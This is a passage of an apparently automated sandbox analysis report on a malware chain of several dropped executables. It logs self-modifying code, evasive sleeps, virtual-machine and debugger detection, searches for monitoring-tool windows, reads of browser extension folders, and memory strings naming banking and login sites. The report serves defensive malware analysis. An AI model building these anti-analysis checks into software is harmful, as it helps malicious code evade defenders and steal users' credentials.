Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Special instruction interceptor: First address: 596C80 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Special instruction interceptor: First address: 5756E9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Special instruction interceptor: First address: 5F18B0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Special instruction interceptor: First address: 49F9C1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Special instruction interceptor: First address: 63DD2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Special instruction interceptor: First address: 6C98E1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Special instruction interceptor: First address: ABDD2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Special instruction interceptor: First address: ABDDE6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Special instruction interceptor: First address: C6CBC2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Special instruction interceptor: First address: CF6AF4 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Memory allocated: 4AA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Memory allocated: 4C70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Memory allocated: 4AC0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05380C07 rdtsc 0_2_05380C07
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found evaded block containing many API calls
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Evaded block: after key decision
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe API coverage: 9.4 %
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe API coverage: 1.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1680 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1680 Thread sleep time: -62031s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2716 Thread sleep time: -56028s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6728 Thread sleep count: 235 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6728 Thread sleep time: -7050000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6532 Thread sleep time: -58029s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1012 Thread sleep time: -46023s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5660 Thread sleep time: -56028s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6764 Thread sleep time: -60030s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6000 Thread sleep time: -50025s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2704 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6728 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 1016 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 6208 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 85 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 78 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 79 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 62 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 89 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 105 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 98 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 192 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 4676 Thread sleep count: 176 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 5176 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe TID: 6436 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe TID: 6108 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe TID: 6388 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe TID: 3496 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe TID: 3580 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe TID: 2740 Thread sleep count: 55 > 30
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe TID: 2740 Thread sleep time: -330000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_004176E7 FindFirstFileExW, 7_2_004176E7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10007EA9 FindFirstFileExW, 7_2_10007EA9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B8794E FindFirstFileExW, 7_2_04B8794E
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E354D1 sqlite3_os_init,GetSystemInfo, 9_2_61E354D1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: file.exe, 00000000.00000002.2056484384.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2088343530.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.2090254348.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.2089649598.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.3259289947.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, 4611cc433b.exe, 4611cc433b.exe, 00000007.00000002.3256554166.00000000009AE000.00000040.00000001.01000000.0000000A.sdmp, 79ddad050f.exe, 79ddad050f.exe, 00000008.00000002.3256159559.000000000054C000.00000040.00000001.01000000.0000000B.sdmp, e051bdf457.exe, e051bdf457.exe, 00000009.00000002.3257897412.0000000000621000.00000040.00000001.01000000.0000000C.sdmp, 79ddad050f.exe, 0000000A.00000002.3255716467.000000000054C000.00000040.00000001.01000000.0000000B.sdmp, e051bdf457.exe, 0000001D.00000002.3256089831.0000000000621000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.0000000005974000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3269197197.0000000001039000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000002.3265991208.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000002.3287900266.00000000054A3000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3179670006.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093554780.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001321000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 79ddad050f.exe, 00000008.00000003.3179670006.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093554780.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>n
Source: firefox.exe, 0000001B.00000002.3346986289.000001C237CA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3270378870.000001E2D6F19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: ba17bbfb21.exe, 0000000B.00000003.3192824207.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192083884.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192201553.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3191990285.0000000000EB3000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000002.3201654535.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192753204.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192595579.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000002.3196255581.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3292547880.000001C22DFC6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3272612424.000001E2D7000000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: ba17bbfb21.exe, 0000000B.00000003.3192083884.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3194034279.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192201553.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3191990285.0000000000EB3000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192753204.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192595579.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWO
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.0000000005974000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWR
Source: e051bdf457.exe, 0000001D.00000002.3262185406.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: firefox.exe, 0000001B.00000002.3523030671.000001C23BB69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:I
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2056484384.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2088343530.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2089649598.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.3259289947.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, 4611cc433b.exe, 00000007.00000002.3256554166.00000000009AE000.00000040.00000001.01000000.0000000A.sdmp, 79ddad050f.exe, 00000008.00000002.3256159559.000000000054C000.00000040.00000001.01000000.0000000B.sdmp, e051bdf457.exe, 00000009.00000002.3257897412.0000000000621000.00000040.00000001.01000000.0000000C.sdmp, 79ddad050f.exe, 0000000A.00000002.3255716467.000000000054C000.00000040.00000001.01000000.0000000B.sdmp, e051bdf457.exe, 0000001D.00000002.3256089831.0000000000621000.00000040.00000001.01000000.0000000C.sdmp, 734386a52c.exe, 0000001E.00000002.3262506890.0000000000C3C000.00000040.00000001.01000000.00000014.sdmp, 734386a52c.exe, 0000001E.00000000.3163160815.0000000000C3C000.00000080.00000001.01000000.00000014.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: firefox.exe, 0000001C.00000002.3272612424.000001E2D7000000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk$R
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053803EA Start: 05380448 End: 0538042B 0_2_053803EA
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort
